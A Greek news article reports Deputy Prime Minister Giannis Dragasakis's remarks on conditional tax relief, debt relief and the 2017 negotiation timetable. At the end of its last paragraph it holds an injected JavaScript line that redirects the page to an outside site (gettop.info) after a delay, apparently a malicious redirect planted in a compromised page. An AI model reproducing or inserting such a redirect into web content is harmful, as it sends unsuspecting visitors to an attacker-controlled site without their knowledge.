Δραγασάκης: Φοροελαφρύνσεις, εφόσον προχωρήσει η ελάφρυνση του χρέους

0
4

 

Mιλώντας σε εκδήλωση του οργανισμού «διαΝΕΟσις» ο αντιπρόεδρος της κυβέρνησης Γιάννης Δραγασάκης προανήγγειλε χαλάρωση της δημοσιονομικής πολιτικής από το 2019 και φορολογικές ελαφρύνσεις εφόσον οι Ευρωπαίοι προχωρήσουν στην ελάφρυνση του δημοσίου χρέους.

Όπως σημείωσε, μία μείωση του χρέους που θα συνοδεύεται με μείωση των πλεονασμάτων μετά το 2018, θα δώσει τη δυνατότητα στη χώρα να πληρώνει λιγότερα για το χρέος και περισσότερα για την ανάπτυξη, γεγονός που θα καθιστά και το χρέος βιώσιμο. Πρόκειται για ένα αίτημα δίκαιο και αμοιβαία επωφελές, είπε ο κ. Δραγασάκης επισημαίνοντας ότι δεν προσφέρουν καλή υπηρεσία όσοι αυτοβούλως συνδέουν το αίτημα αυτό με νέες δεσμεύσεις ή ακόμη και νέα μνημόνια.

Επίσης, επέκρινε την αξιωματική αντιπολίτευση ότι επιδιώκει την αποτυχία της διαπραγμάτευσης προκειμένου η χώρα να αναγκαστεί να υπογράψει ένα τέταρτο Μνημόνιο.

Σχετικά με τη διαδικασία της διαπραγμάτευσης υπογράμμισε ότι κατεύθυνση της κυβερνητικής πολιτικής είναι η επαναφορά των συλλογικών διαπραγματεύσεων, ο σεβασμός των δικαιωμάτων των εργαζομένων, η αποφασιστική αντιμετώπιση της εργοδοτικής παραβατικότητας και της εργοδοτικής αυθαιρεσίας, η συστηματική καταπολέμηση του προβλήματος της ανασφάλιστης και της μαύρης εργασίας.

Σε κάθε περίπτωση όλα όσα συνδέονται με τη διαπραγμάτευση θα πρέπει να πραγματοποιηθούν μέσα στο πρώτο τρίμηνο, το αργότερο μέσα στο πρώτο πεντάμηνο του 2017, είπε ο κ. Δραγασάκης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here